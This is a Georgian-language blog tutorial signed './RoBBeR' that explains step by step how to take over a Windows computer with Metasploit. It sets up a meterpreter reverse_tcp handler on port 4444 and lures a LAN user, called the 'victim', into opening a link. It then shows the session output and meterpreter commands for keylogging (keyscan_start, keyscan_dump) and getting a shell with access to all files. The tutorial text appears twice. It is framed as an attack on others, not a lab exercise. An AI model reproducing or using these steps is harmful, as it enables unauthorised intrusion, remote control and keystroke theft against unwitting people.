მოგესალმებით ყველას, დღეს აგიხსნით ძალიან მარტივად კომპიუტერის გატეხვას მეტასპლოიტის საშუალებით. მაშ ასე დავიწყოთ:
ნაბიჯი #1 : ვხსნით მეტასპლოიტის კონსოლს და ვწერთ შემდეგ რაღაცას
use exploit/multi/handler
ბანიჯი #2 : ამის შემდეგ ვწერთ ესეთ რამეს
set PAYLOAD windows/meterpreter/reverse_tcp და უნდა დაწეროს ესეთი რამ
PAYLOAD => windows/meterpreter/reverse_tcp
ნაბიჯი #3 : ვწერ ესეთ რამეს set LHOST 192.168.1.107 ჩემ შემთხვევაში ესაა შიდა IP თქვენ შემთხვევაში სხვანაერად იქნება (შიდა IP-ს ვიყენებთ თუ LOCAL-ში ვჩალიჩობთ და თუ GLOBAL-ში მაშინ გარე IP-ს ვიყენებთ)
ამის შემდეგ უნდა დაწეროს ესეთი რამ LHOST => 192.168.255.130
ნაბიჯი #4 : ვწერ ესეთ რამეს set LPORT 4444 ამის დაწერის მერე უნდა გამოიტანოს ესეთი რამ LPORT => 4444 (იმისათვის რომ 4444 პორტზე დაგიკავშირდნენ გლობალიდან, გახსნილი უნდა გქონდეთ ეს პორტი)
ნაბიჯი #5 : როდესაც ამ ყველაფერს ვიზავთ უნდა დავწეროთ ესეთი ბრძანება exploit
თუ ყველაფერი ზუსტათ გააკეთეთ მაშინ უნდა დაწეროს შემდეგი რამ :
თუ ესეთირ ამ დაგიწერათ ესეგი ის ელოდება მსხვერპლის ამ მისამართზე შესვლას მივცეთ ეს ლინკი რომელიმე LAN-ში მყოფ იუზერს და როდესაც გასნის ტექსტი გაგრძელდება და დაეწერება ესეთი რამ :
(192.168.255.1:62853 ეს IP არის მსხვერპლის შიდა IP) ანუ მსხვერპლი დაგვიკავშირდა ))
ამ ყველაფრის შემდეგ დაგვიწერს ესეთ რამეს:
meterpreter >
ამის შემდეგ ჩვენ შეგვილია ბევრი ბრძანება ჩავწეროთ მაგ:
1) ps - ამ ბრძანებით ვნახავთ თურ ა პროცესებია გაშვებული
2) keyscan_start - ამ ბრძანებით ტქვენ ჩართავთ ქეილოგერს
3) shell - ამ ბრძანებით კი თქვენ გექნებათ კომპიუტერის ნებისმიერ ფოლდერში და ნებისმიერ დოკუმენტზე წვდომა იგივე სახისაა რაც (CMD)
4) keyscan_dump - ეს ბრძანება არის იმისთვის რომ რაც ქეილოგერმა დააფიქსირა ისინი განახოთ ))
ვსო სულ ეს იყო)) წარმატებებს გისურვებთ ყველას ./RoBBeR
ნაბიჯი #1 : ვხსნით მეტასპლოიტის კონსოლს და ვწერთ შემდეგ რაღაცას
use exploit/multi/handler
ბანიჯი #2 : ამის შემდეგ ვწერთ ესეთ რამეს
set PAYLOAD windows/meterpreter/reverse_tcp და უნდა დაწეროს ესეთი რამ
PAYLOAD => windows/meterpreter/reverse_tcp
ნაბიჯი #3 : ვწერ ესეთ რამეს set LHOST 192.168.1.107 ჩემ შემთხვევაში ესაა შიდა IP თქვენ შემთხვევაში სხვანაერად იქნება (შიდა IP-ს ვიყენებთ თუ LOCAL-ში ვჩალიჩობთ და თუ GLOBAL-ში მაშინ გარე IP-ს ვიყენებთ)
ამის შემდეგ უნდა დაწეროს ესეთი რამ LHOST => 192.168.255.130
ნაბიჯი #4 : ვწერ ესეთ რამეს set LPORT 4444 ამის დაწერის მერე უნდა გამოიტანოს ესეთი რამ LPORT => 4444 (იმისათვის რომ 4444 პორტზე დაგიკავშირდნენ გლობალიდან, გახსნილი უნდა გქონდეთ ეს პორტი)
ნაბიჯი #5 : როდესაც ამ ყველაფერს ვიზავთ უნდა დავწეროთ ესეთი ბრძანება exploit
თუ ყველაფერი ზუსტათ გააკეთეთ მაშინ უნდა დაწეროს შემდეგი რამ :
[*] Started reverse handler on 192.168.1.107:4444
[*] Starting the payload handler... თუ ესეთირ ამ დაგიწერათ ესეგი ის ელოდება მსხვერპლის ამ მისამართზე შესვლას მივცეთ ეს ლინკი რომელიმე LAN-ში მყოფ იუზერს და როდესაც გასნის ტექსტი გაგრძელდება და დაეწერება ესეთი რამ :
[*] Sending stage (749056 bytes) to 192.168.1.107
[*] Meterpreter session 1 opened (192.168.1.107:4444 -> 192.168.255.1:62853) at Sun Mar 13 11:32:12 -0400 2011(192.168.255.1:62853 ეს IP არის მსხვერპლის შიდა IP) ანუ მსხვერპლი დაგვიკავშირდა ))
ამ ყველაფრის შემდეგ დაგვიწერს ესეთ რამეს:
meterpreter >
ამის შემდეგ ჩვენ შეგვილია ბევრი ბრძანება ჩავწეროთ მაგ:
1) ps - ამ ბრძანებით ვნახავთ თურ ა პროცესებია გაშვებული
2) keyscan_start - ამ ბრძანებით ტქვენ ჩართავთ ქეილოგერს
3) shell - ამ ბრძანებით კი თქვენ გექნებათ კომპიუტერის ნებისმიერ ფოლდერში და ნებისმიერ დოკუმენტზე წვდომა იგივე სახისაა რაც (CMD)
4) keyscan_dump - ეს ბრძანება არის იმისთვის რომ რაც ქეილოგერმა დააფიქსირა ისინი განახოთ ))
ვსო სულ ეს იყო)) წარმატებებს გისურვებთ ყველას ./RoBBeR
No comments:
Post a Comment